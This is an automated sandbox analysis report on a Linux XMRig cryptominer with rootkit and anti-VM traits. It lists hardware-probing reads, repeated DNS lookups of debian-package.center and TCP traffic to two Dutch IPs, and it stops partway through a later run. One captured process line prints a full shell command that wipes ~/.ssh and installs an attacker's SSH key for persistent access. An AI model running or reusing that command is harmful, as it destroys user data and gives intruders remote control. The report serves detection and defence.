Malware Analysis Report

2024-10-16 05:30

Sample ID 240628-p5d92stcjl
Target 1a316d0973bb4f80adeda96a9ff52198_JaffaCakes118
SHA256 7a7bfa4f84e073d45b33ca6d4e5f263d31aa512d124bc6c682029f2b831c7c08
Tags
miner xmrig antivm rootkit
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7a7bfa4f84e073d45b33ca6d4e5f263d31aa512d124bc6c682029f2b831c7c08

Threat Level: Known bad

The file 1a316d0973bb4f80adeda96a9ff52198_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

miner xmrig antivm rootkit

XMRig Miner payload

Xmrig family

Executes dropped EXE

Loads a kernel module

Enumerates running processes

Checks hardware identifiers (DMI)

Reads hardware information

Checks CPU configuration

Reads CPU attributes

Reads runtime system information

Enumerates kernel/hardware configuration

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-28 12:54

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu2204-amd64-20240522.1-en

Max time kernel

149s

Max time network

150s

Command Line

[/tmp/.rsync/a/anacron]

Signatures

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/.rsync/a/anacron N/A

Reads hardware information

Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_serial /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/board_version /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_date /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/board_name /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_version /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial /tmp/.rsync/a/anacron N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /tmp/.rsync/a/anacron N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/system/cpu/possible /tmp/.rsync/a/anacron N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/dax/devices /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/node/devices/node0/hugepages /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/virtual/dmi/id /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/node/devices/node0/cpumap /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/dax/target_node /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets /tmp/.rsync/a/anacron N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/dax/devices/target_node /tmp/.rsync/a/anacron N/A
File opened for reading /sys/kernel/mm/hugepages /tmp/.rsync/a/anacron N/A
File opened for reading /sys/devices/system/node/online /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/node/devices/node0/meminfo /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level /tmp/.rsync/a/anacron N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition /tmp/.rsync/a/anacron N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/mounts /tmp/.rsync/a/anacron N/A
File opened for reading /proc/meminfo /tmp/.rsync/a/anacron N/A
File opened for reading /proc/driver/nvidia/gpus /tmp/.rsync/a/anacron N/A
File opened for reading /proc/elog /tmp/.rsync/a/anacron N/A

Processes

/tmp/.rsync/a/anacron

[/tmp/.rsync/a/anacron]

/bin/sh

[sh -c cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
NL 45.9.148.125:80 tcp
NL 45.9.148.129:80 tcp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
NL 45.9.148.125:80 tcp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
NL 45.9.148.125:80 tcp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
NL 45.9.148.125:80 tcp
NL 45.9.148.125:80 tcp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
NL 45.9.148.129:80 tcp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
NL 45.9.148.125:80 tcp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
NL 45.9.148.125:80 tcp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
NL 45.9.148.125:80 tcp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
NL 45.9.148.125:80 tcp
US 1.1.1.1:53 debian-package.center udp
NL 45.9.148.129:80 tcp
US 1.1.1.1:53 debian-package.center udp
NL 45.9.148.125:80 tcp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
NL 45.9.148.125:80 tcp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
NL 45.9.148.125:80 tcp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
NL 45.9.148.125:80 tcp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
NL 45.9.148.129:80 tcp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
NL 45.9.148.125:80 tcp
US 1.1.1.1:53 debian-package.center udp
NL 45.9.148.125:80 tcp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
NL 45.9.148.125:80 tcp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
NL 45.9.148.125:80 tcp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 8.8.8.8:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
US 1.1.1.1:53 debian-package.center udp
NL 45.9.148.129:80 tcp
NL 45.9.148.125:80 tcp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.rsync/c/lib/32/libnss_dns.so.2]

Signatures

N/A

Processes

/tmp/.rsync/c/lib/32/libnss_dns.so.2

[/tmp/.rsync/c/lib/32/libnss_dns.so.2]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:54

Platform

ubuntu2404-amd64-20240523-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:58

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.rsync/c/lib/64/libdl.so.2]

Signatures

N/A

Processes

/tmp/.rsync/c/lib/64/libdl.so.2

[/tmp/.rsync/c/lib/64/libdl.so.2]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsel-20240418-en

Max time kernel

14s

Command Line

[/tmp/.rsync/a/a]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/.rsync/a/upd /tmp/.rsync/a/upd N/A

Enumerates running processes
